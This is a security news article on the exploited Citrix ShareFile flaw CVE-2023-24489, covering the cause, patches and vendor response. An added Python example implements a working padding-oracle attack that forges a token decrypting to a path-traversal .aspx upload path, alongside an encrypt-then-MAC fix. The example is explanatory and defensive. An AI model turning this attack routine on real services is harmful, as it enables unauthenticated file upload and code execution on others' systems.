Critical Citrix ShareFile Flaw Exploited in the Wild: CISA Warns
Organizations use Citrix ShareFile, a cloud-based platform, to store and share large files. It also lets users exchange branded, password-protected files through its products and services.
ShareFile StorageZones lets administrators choose between ShareFile-managed, secure cloud storage and IT-managed storage zones (on-premises) inside an organization's own data center.
The ShareFile Storage Zones Controller extends the ShareFile Software-as-a-Service cloud storage by providing private data storage tied to a ShareFile account.
However, a critical security flaw has been discovered in ShareFile that allows threat actors to remotely compromise customer-managed ShareFile Storage Zones Controllers.
In addition, CISA (the Cybersecurity and Infrastructure Security Agency) has added this vulnerability to its Known Exploited Vulnerabilities catalog.
CVE-2023-24489: Improper Resource Control
The Citrix ShareFile Storage Zones Controller is a .NET application that runs under IIS. It uses AES encryption in CBC (Cipher Block Chaining) mode with PKCS#7 (Public-Key Cryptography Standards) padding, and the bug lies in how it validates the decrypted data: the check is effectively limited to whether the padding is valid, which is the classic padding-oracle condition. Encryption alone does not authenticate a ciphertext, so a client-supplied value that decrypts with valid padding is accepted as if the server had produced it.
As a result, an unauthenticated arbitrary file upload leading to remote code execution on the Citrix ShareFile Storage Zones Controller exists because of an error in handling cryptographic operations.
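To make the bug class concrete, here is an added example (not code from the article, from Citrix or from the Assetnote research, and not the actual exploit): a toy service that decrypts a client-supplied CBC/PKCS#7 token and lets padding failures show, an attacker routine that uses that one bit of information to forge a ciphertext decrypting to a chosen value (for instance a traversal path) without ever learning the key, and the encrypt-then-MAC fix that closes the oracle. A small Feistel construction stands in for AES so the example runs with the standard library alone; the attack does not depend on the cipher. The class names, the token layout (iv || ciphertext, optionally || HMAC tag) and the sample plaintexts are constructed for the demo.

```python
import hashlib, hmac, os

BLOCK = 16  # block size in bytes; the attack only needs this to match the cipher

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _f(key, half, rnd):
    # Feistel round function: keyed SHA-256 truncated to the half-block size.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]

def toy_encrypt_block(key, block):
    # 4-round Feistel over one 16-byte block. Stands in for AES; NOT a secure cipher.
    left, right = block[:8], block[8:]
    for rnd in range(4):
        left, right = right, _xor(left, _f(key, right, rnd))
    return left + right

def toy_decrypt_block(key, block):
    left, right = block[:8], block[8:]
    for rnd in reversed(range(4)):
        left, right = _xor(right, _f(key, left, rnd)), left
    return left + right

def pkcs7_pad(data):
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n

def pkcs7_unpad(data):
    n = data[-1] if data else 0
    if not 1 <= n <= BLOCK or data[-n:] != bytes([n]) * n:
        raise ValueError("bad padding")
    return data[:-n]

def cbc_encrypt(key, iv, padded):
    out, prev = b"", iv
    for i in range(0, len(padded), BLOCK):
        prev = toy_encrypt_block(key, _xor(padded[i:i + BLOCK], prev))
        out += prev
    return out

def cbc_decrypt(key, iv, ct):
    out, prev = b"", iv
    for i in range(0, len(ct), BLOCK):
        out += _xor(toy_decrypt_block(key, ct[i:i + BLOCK]), prev)
        prev = ct[i:i + BLOCK]
    return pkcs7_unpad(out)

class VulnerableZone:
    """Hypothetical server: decrypts a client token; the only validation is padding."""
    def __init__(self):
        self.key = os.urandom(32)
    def issue_token(self, plaintext):
        iv = os.urandom(BLOCK)
        return iv + cbc_encrypt(self.key, iv, pkcs7_pad(plaintext))
    def decrypt_token(self, token):
        return cbc_decrypt(self.key, token[:BLOCK], token[BLOCK:])
    def padding_oracle(self, token):
        # A distinguishable failure (error page, status code, timing) IS the oracle.
        try:
            self.decrypt_token(token)
        except (ValueError, PermissionError):
            return False
        return True

def recover_intermediate(oracle, block):
    """Learn D_K(block) one byte at a time using only padding validity."""
    inter = bytearray(BLOCK)
    for k in range(BLOCK - 1, -1, -1):
        pad = BLOCK - k
        for guess in range(256):
            probe = bytearray(BLOCK)
            for j in range(k + 1, BLOCK):
                probe[j] = inter[j] ^ pad          # force already-known tail bytes to `pad`
            probe[k] = guess
            if not oracle(bytes(probe) + block):   # probe acts as the IV for `block`
                continue
            if k == BLOCK - 1:                     # rule out a \x02\x02-style false hit
                probe[k - 1] ^= 0xFF
                if not oracle(bytes(probe) + block):
                    continue
            inter[k] = guess ^ pad
            break
        else:
            raise RuntimeError("no padding oracle available")
    return bytes(inter)

def forge_token(oracle, plaintext):
    """Build iv||ct that decrypts to `plaintext` without the key, working backwards."""
    padded = pkcs7_pad(plaintext)
    cur = os.urandom(BLOCK)                        # the last ciphertext block is arbitrary
    token = cur
    for i in range(len(padded) - BLOCK, -1, -BLOCK):
        cur = _xor(recover_intermediate(oracle, cur), padded[i:i + BLOCK])
        token = cur + token
    return token

class HardenedZone(VulnerableZone):
    """Fix: encrypt-then-MAC. A bad tag fails uniformly before padding is ever examined."""
    def __init__(self):
        super().__init__()
        self.mac_key = os.urandom(32)
    def _tag(self, body):
        return hmac.new(self.mac_key, body, hashlib.sha256).digest()
    def issue_token(self, plaintext):
        body = super().issue_token(plaintext)
        return body + self._tag(body)
    def decrypt_token(self, token):
        body, tag = token[:-32], token[-32:]
        if not hmac.compare_digest(self._tag(body), tag):
            raise PermissionError("bad tag")       # same failure for every tampered token
        return cbc_decrypt(self.key, body[:BLOCK], body[BLOCK:])
```

`forge_token(zone.padding_oracle, b"../../webroot/upload/x.aspx")` returns a token that `VulnerableZone.decrypt_token` happily unpads to the chosen path after at most 256 oracle queries per byte. Run against `HardenedZone.padding_oracle`, every probe fails the tag check, so `recover_intermediate` raises instead of making progress. The design point is that the server must authenticate the ciphertext (or use an AEAD mode) before decrypting, and must not let padding errors be distinguishable from any other rejection.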
NVD rated the severity of this vulnerability 9.8 (Critical), as reported to Cyber Security News by GreyNoise.
According to the research from Assetnote, the work started with a path traversal in the parentId parameter, reached through the upload.targetPath member variable. Further research into the encryption and authentication then uncovered the cryptographic bug that leads to remote code execution.
In addition, a proof-of-concept (PoC) has been published on GitHub, giving threat actors an easy path to exploiting this vulnerability against unpatched instances. According to the Assetnote report, between 1,000 and 6,000 ShareFile Storage Zones Controller instances were exposed on the internet.
Citrix has released patches for the vulnerability, which affects Citrix ShareFile Content Collaboration. Note that network access to the ShareFile Storage Zones Controller is required to exploit this vulnerability.
Customers of this product are advised to upgrade to the latest version to prevent threat actors from exploiting it.
ShareFile's Response to the Incident
"We take security very seriously here at ShareFile. Prior to the CVE release, we had patched, validated, and run extensive testing against the product to validate its safety. Protecting our customers' data is a cornerstone of our products."
Version 5.11.24
"We worked with and notified impacted customers prior to the released CVE to update to the latest version of our software to ensure the security of their data. Our control plane is not connected to any ShareFile StorageZones Controller (SZC) that is not patched. We want to remind our customers that they need to make sure that they completely shut down any system running an older version of the SZC software that has been disconnected from the ShareFile control plane."
Source credit: cybersecuritynews.com